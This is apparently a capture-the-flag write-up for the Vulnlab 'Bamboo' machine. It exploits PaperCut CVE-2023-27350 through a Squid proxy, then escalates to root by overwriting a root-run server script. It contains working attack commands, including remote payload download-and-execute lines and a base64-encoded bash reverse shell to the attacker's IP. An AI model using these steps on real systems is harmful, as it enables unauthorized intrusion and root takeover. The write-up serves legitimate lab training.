Bamboo - VL
Bamboo - VL
Bamboo - Printers goes wild!
Is a Medium machine from Vulnlab where I’ll exploit a PaperCut CVE through a proxy to get the foothold and later will explore the PaperCut webapp alongside pspy running on the machine to catch a bash script being executed when clicked certian button. I can modify the script and will put a reverse shell then trigger it via clicking on a certain feature of PaperCut.
Recon
Nmap
As always, running nmap:
1
2
3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open http-proxy Squid http proxy 5.2
Squid is a proxy that sits between users and the internet, forwarding requests while caching content to improve speed and reduce bandwidth.
Squid Proxy
For further enumeration, I can use spose.py to enumerate the internal open ports but I’ll rather use xct’s squidscanner.
Firstly, I’ll update IP:PORT on the scanner then build it to scan the ports.
1
2
go mod tidy
go build
Running it does yield the open ports.
1
2
3
4
5
6
7
8
➜ Bamboo ./squidscan
0 / 65535 [__________________________________________________________________________________________________________________________________________________________________________________________________________________] 0.00% ? p/sPort 22 found!
9029 / 65535 [---------------------------->_______________________________________________________________________________________________________________________________________________________________________________] 13.78% 474 p/sPort 9195 found!
Port 9192 found!
9238 / 65535 [---------------------------->_______________________________________________________________________________________________________________________________________________________________________________] 14.10% 477 p/sPort 9173 found!
Port 9174 found!
10153 / 65535 [------------------------------->___________________________________________________________________________________________________________________________________________________________________________] 15.49% 484 p/sPort 9191 found!
14131 / 65535 [------------------------------------------->_______________________________________________________________________________________________________________________________________________________________] 21.56% 481 p/s
The most suspicious one is 9191, I know because there is a room on TryHackMe exploiting PaperCut which is what we are exploiting on this box.
I can curl the page via cURL with --proxy flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜ Bamboo curl --proxy 10.10.67.181:3128 http://10.10.67.181:9191/user
<!DOCTYPE HTML>
<!-- Application: app-server -->
<!-- Page: Home -->
<!-- Generated: Tue Aug 26 21:30:07 UTC 2025 -->
<html lang="en">
<SNIP>
<polygon points="37.7,198.5 140.4,198.5 96.3,136.3 "/>
<polygon points="0,79.5 0,198.5 37.7,198.5 96.3,136.3 45,63.6 "/>
<polygon points="0,79.5 45,63.6 0,0 "/>
<polygon points="0,79.5 0,79.5 0,79.5 "/>
<polygon points="262.3,198.5 280.7,198.5 265.7,187.9 "/>
<polygon points="224.8,198.5 262.3,198.5 265.7,187.9 224.8,159 "/>
</svg>
<SNIP>
<!-- Render time: ~ 18 ms -->
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜ Bamboo curl -I --proxy 10.10.67.181:3128 http://10.10.67.181:9191/user
HTTP/1.1 200 OK
Date: Tue, 26 Aug 2025 21:32:48 GMT
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1
Set-Cookie: JSESSIONID=node01xs1e3dk67sgb1h6ea8m5xmdio2.node0; Path=/; HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 12392
X-Cache: MISS from bamboo
X-Cache-Lookup: MISS from bamboo:3128
Via: 1.1 bamboo (squid/5.2)
Connection: keep-alive
$ as Papercut
PaperCut CVE
Since it’s a web port, we can add it to foxyproxy and try to access the page.
PaperCut has a CVE as I mentioned above. CVE-2023-27350
The exploit is that the login page can be bypassed simply via going to this
/app?service=page/SetupCompletedand clicking on Login, for getting shell I can exec scripts in the script-manager for Printers. CVE-2023-27350 PoC
The steps are these:
- Go to this URL:
http://10.10.67.181:9191/app?service=page/SetupCompleted - Click on
LogIn - Redirects to
Dashboard. - Options -> set
print-and-device.script.enabledtoY. - Printers ->
[Template Printer] - Scripting -> Insert code snippet to exec.
- Click Apply
Code Snippet:
1
2
3
4
5
6
7
8
9
10
//
// Customize your print process with Print Scripting. You don't have to be a
// programmer to use Print Scripting. Use one of the many pre-written recipes
// already written for you, or write your own in JavaScript using snippets and
// reference documentation.
//
function printJobHook(inputs, actions) {
// your script here
}
java.lang.Runtime.getRuntime().exec('curl IP/shell');
I attempted to exploit PaperCut manually, but remote code execution failed. Executing the code snippet gave me this error below, said doesn’t know what is Java but PoC worked out of the box.
Error:
The script failed to validate, check the script syntax: ReferenceError: "java" is not defined. (printer-script#2)
I’ll update my proxychains first.
1
2
3
4
5
6
7
➜ ~ tail -n 5 /etc/proxychains.conf h
==> /etc/proxychains.conf <==
# meanwhile
# defaults set to "tor"
#socks4 127.0.0.1 9050
http 10.10.67.181 3128
Then I will transfer the shell onto the box, chmod it and then run it.
1
2
3
4
5
6
7
8
9
10
11
12
13
➜ Bamboo proxychains -q uv run CVE-2023-27350/CVE-2023-27350.py --url http://10.10.67.181:9191 --command "curl 10.8.7.35/xf -o xf"
<SNIP>
[+] Executed successfully!
<SNIP>
[*] Updating print.script.sandboxed to Y
➜ Bamboo proxychains -q uv run CVE-2023-27350/CVE-2023-27350.py --url http://10.10.67.181:9191 --command "chmod +x xf; ./xf"
<SNIP>
[+] Executed successfully!
<SNIP>
➜ Bamboo proxychains -q uv run CVE-2023-27350/CVE-2023-27350.py --url http://10.10.67.181:9191 --command "./xf"
<SNIP>
[+] Executed successfully!
<SNIP>
You could use busybox nc IP PORT but I’m using penelope to handle my shells.
1
2
3
4
5
6
7
8
9
10
11
➜ ~ penelope
[+] Listening for reverse shells on 10.8.7.35
➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from bamboo~10.10.67.181-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
papercut@bamboo:~/server$
papercut@bamboo:~/server$ wc -l ../user.txt
1 ../user.txt
# as root
At this point I did spend some time looking around to find privesc, after some time when I couldn’t figure it out, I looked at the VL wiki.
Explore the web application while looking at the output of pspy64. Something inside the user’s home folder will be executed as root.
So, I uploaded pspy to the machine and started looking around.
1
2
3
4
papercut@bamboo:~/server$ wget 10.8.7.35/pspy64
<SNIP>
pspy64 100%[=============================================>] 2.96M 323KB/s in 11s
<SNIP>
1
10.10.67.181 - - [[26/Aug/2025 23:23:25]] "GET /pspy64 HTTP/1.1" 200 -
Running pspy doesn’t show anything instantly.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
papercut@bamboo:~/server$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2025/08/26 22:25:09 CMD: UID=1001 PID=1397 | ./pspy64
2025/08/26 22:25:09 CMD: UID=1001 PID=1381 | /bin/bash -i
<PENELOPE AGENT PROCESS>
2025/08/26 22:25:09 CMD: UID=1001 PID=1352 | /bin/bash
2025/08/26 22:25:09 CMD: UID=1001 PID=1351 | /bin/sh ./xf
2025/08/26 22:25:09 CMD: UID=0 PID=1338 |
2025/08/26 22:25:09 CMD: UID=0 PID=1336 |
2025/08/26 22:25:09 CMD: UID=0 PID=1316 |
2025/08/26 22:25:09 CMD: UID=0 PID=1305 |
2025/08/26 22:25:09 CMD: UID=0 PID=1236 |
2025/08/26 22:25:09 CMD: UID=0 PID=1213 |
2025/08/26 22:25:09 CMD: UID=13 PID=720 | (pinger)
2025/08/26 22:25:09 CMD: UID=13 PID=711 | (logfile-daemon) /var/log/squid/access.log
2025/08/26 22:25:09 CMD: UID=13 PID=701 | (squid-1) --kid squid-1 --foreground -sYC
2025/08/26 22:25:09 CMD: UID=0 PID=687 | /usr/libexec/polkitd --no-debug
<SNIP>
2025/08/26 22:25:09 CMD: UID=0 PID=652 | /usr/sbin/squid --foreground -sYC
2025/08/26 22:25:09 CMD: UID=114 PID=642 | /usr/sbin/chronyd -F 1
2025/08/26 22:25:09 CMD: UID=114 PID=638 | /usr/sbin/chronyd -F 1
2025/08/26 22:25:09 CMD: UID=1001 PID=636 | /home/papercut/server/bin/linux-x64/./app-monitor /home/papercut/server/bin/linux-x64/./app-monitor.conf wrapper.syslog.ident=papercut-app-server wrapper.pidfile=/home/papercut/server/bin/linux-x64/../../logs/papercut-app-server.pid
2025/08/26 22:25:09 CMD: UID=0 PID=605 | sshd: /usr/sbin/sshd -D -o AuthorizedKeysCommand /usr/share/ec2-instance-connect/eic_run_authorized_keys %u %f -o AuthorizedKeysCommandUser ec2-instance-connect [listener] 0 of 10-100 startups
2025/08/26 22:25:09 CMD: UID=0 PID=576 | v2023-02-14-1341/pc-print-deploy-server -dataDir=/home/papercut/providers/print-deploy/linux-x64//data -pclog.dev
2025/08/26 22:25:09 CMD: UID=0 PID=541 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2025/08/26 22:25:09 CMD: UID=0 PID=537 | /sbin/agetty -o -p -- \u --keep-baud 115200,57600,38400,9600 ttyS0 vt220
2025/08/26 22:25:09 CMD: UID=0 PID=529 | /lib/systemd/systemd-logind
2025/08/26 22:25:09 CMD: UID=0 PID=527 | /usr/lib/snapd/snapd
2025/08/26 22:25:09 CMD: UID=104 PID=524 | /usr/sbin/rsyslogd -n -iNONE
2025/08/26 22:25:09 CMD: UID=1001 PID=523 | /usr/bin/perl /home/papercut/providers/web-print/linux-x64/pc-web-print
2025/08/26 22:25:09 CMD: UID=0 PID=522 | /home/papercut/providers/print-deploy/linux-x64/pc-print-deploy
2025/08/26 22:25:09 CMD: UID=1001 PID=521 | /bin/sh /home/papercut/server/bin/linux-x64/app-server startd
2025/08/26 22:25:09 CMD: UID=0 PID=520 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2025/08/26 22:25:09 CMD: UID=0 PID=518 | /usr/sbin/irqbalance --foreground
2025/08/26 22:25:09 CMD: UID=102 PID=511 | @dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2025/08/26 22:25:09 CMD: UID=0 PID=510 | /usr/sbin/cron -f -P
2025/08/26 22:25:09 CMD: UID=0 PID=506 | /usr/sbin/acpid
2025/08/26 22:25:09 CMD: UID=101 PID=471 | /lib/systemd/systemd-resolved
2025/08/26 22:25:09 CMD: UID=100 PID=469 | /lib/systemd/systemd-networkd
2025/08/26 22:25:09 CMD: UID=0 PID=331 |
2025/08/26 22:25:09 CMD: UID=0 PID=241 |
2025/08/26 22:25:09 CMD: UID=0 PID=240 |
2025/08/26 22:25:09 CMD: UID=0 PID=213 | /lib/systemd/systemd-udevd
2025/08/26 22:25:09 CMD: UID=0 PID=210 | /sbin/multipathd -d -s
2025/08/26 22:25:09 CMD: UID=0 PID=209
I tried for some hours to mess around with the PaperCut webapp but couldn’t find anything triggering. It took me very long time to figure out. But it was very simple.
So the steps are as below
Enable Printing Tab-> ClickImport BYOD-friendly print queueson the right side -> Click Next ->Start Importing Mobility Print printers
1
2
3
4
5
6
7
8
9
10
11
12
13
2025/08/26 22:32:49 CMD: UID=0 PID=1436 | bash -c "/home/papercut/server/bin/linux-x64/server-command" get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1437 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1438 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1439 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1440 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=??? PID=1442 | ???
2025/08/26 22:32:49 CMD: UID=0 PID=1446 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1445 |"SNIPED LONG COMMAND"
2025/08/26 22:32:49 CMD: UID=0 PID=1444 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:49 CMD: UID=0 PID=1447 | /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key
2025/08/26 22:32:51 CMD: UID=0 PID=1466 | /usr/bin/python3 -Es /usr/bin/lsb\_release -sd
It’s running server-command which is the Linux server script. Which is owned by papercut user and of course ran by root.
1
2
papercut@bamboo:~/server/bin/linux-x64$ ls -lah server-command
-rwxr-xr-x 1 papercut papercut 493 Sep 29 2022 server-command
I’ll hit F12 on my penelope shell to background it and type payloads to copy a payload and then write it to the server-command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
papercut@bamboo:~/server/bin/linux-x64$
[!] Session detached ⇲
(Penelope)─(Session [1])> payloads
TCPListener(0.0.0.0:4444)
➤ tun0 → 10.8.7.35:4444
Bash TCP
printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuOC43LjM1LzQ0NDQgMD4mMSkgJg==|base64 -d|bash
<SNIP>
────────────────────────────────────────────────────────────────────────────────
(Penelope)─(Session [1])> sessions 1
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
papercut@bamboo:~/server/bin/linux-x64$ echo "printf KGJhc2ggPiYgL2Rldi90Y3AvMTAuOC43LjM1LzQ0NDQgMD4mMSkgJg==|base64 -d|bash" > server-command
Now that I have written the bash shell onto the server-command, I’ll trigger it via same steps.
And I have a shell.
1
[+] Got reverse shell from bamboo~10.10.67.181-Linux-x86_64 😍️ Assigned SessionID <2>
Now I can grab the root.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
papercut@bamboo:~/server/bin/linux-x64$
[!] Session detached ⇲
(Penelope)─(Session [1])> sessions
➤ bamboo~10.10.67.181-Linux-x86_64
ID | Shell | User | Source
[1] | PTY | papercut(1001) | TCPListener(0.0.0.0:4444)
<2> | Basic | root(0) | TCPListener(0.0.0.0:4444)
(Penelope)─(Session [1])> sessions 2
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@bamboo:/home/papercut/providers/print-deploy/linux-x64# wc -c /root/root.txt
37 /root/root.txt
This post is licensed under
CC BY 4.0
by the author.